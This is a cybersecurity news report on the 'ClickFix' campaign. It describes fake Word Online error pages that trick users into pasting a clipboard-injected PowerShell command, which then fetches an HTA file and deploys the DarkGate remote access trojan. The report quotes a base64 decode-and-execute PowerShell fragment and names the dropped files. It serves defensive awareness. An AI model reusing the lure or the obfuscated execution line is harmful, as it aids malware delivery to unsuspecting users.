A sophisticated social engineering campaign dubbed “ClickFix” has emerged, targeting users with deceptive “Word Online” error messages to distribute the formidable DarkGate malware.
Unlike traditional drive-by downloads, this attack relies on manipulating users into manually executing malicious commands, exploiting their trust in familiar troubleshooting procedures.
The campaign specifically mimics a missing browser extension error, urging victims to click a “How to fix” button to resolve the supposed issue.
The attack begins when a user visits a compromised or malicious webpage displaying the fake notification.
The prompt instructs the victim to open a PowerShell terminal and paste a “fix” command. Unbeknownst to the user, clicking the “How to fix” button triggers a JavaScript function that copies a malicious PowerShell script directly to their clipboard.
This technique cleverly bypasses traditional browser-based security controls by leveraging the user’s own actions to initiate the infection chain.
Point Wild analysts identified this campaign and noted that the reliance on user interaction effectively evades many automated detection systems.
Once the victim pastes and executes the command, the PowerShell script retrieves a malicious HTA file from a remote server.
.webp "New ClickFix 'Word Online' Message Tricks Users into Installing DarkGate Malware 3")
This file serves as a staging ground for the final payload, establishing persistence and preparing the system for the deployment of DarkGate, a potent remote access trojan capable of full system compromise.
Technical Analysis of the Infection Chain
The technical execution of this attack involves multiple layers of obfuscation.
.webp "New ClickFix 'Word Online' Message Tricks Users into Installing DarkGate Malware 4")
The initial webpage contains base64-encoded content processed using a reverse function to hide its true intent, as seen in this figure Base64-encoded data is embedded within the HTML structure.
.webp "New ClickFix 'Word Online' Message Tricks Users into Installing DarkGate Malware 5")
When decoded, the payload contains a PowerShell command that flushes DNS and downloads the next stage.
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64)));This command fetches dark.hta from a compromised domain. Upon execution, the HTA file creates a directory on the C: drive and drops an AutoIt executable and a script named fckhffh.a3x.
.webp "New ClickFix 'Word Online' Message Tricks Users into Installing DarkGate Malware 6")
This script utilizes the DES algorithm to decrypt the final DarkGate payload. The malware then establishes communication with command-and-control servers, completing the compromise and granting attackers unauthorized remote access to the victim machine.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
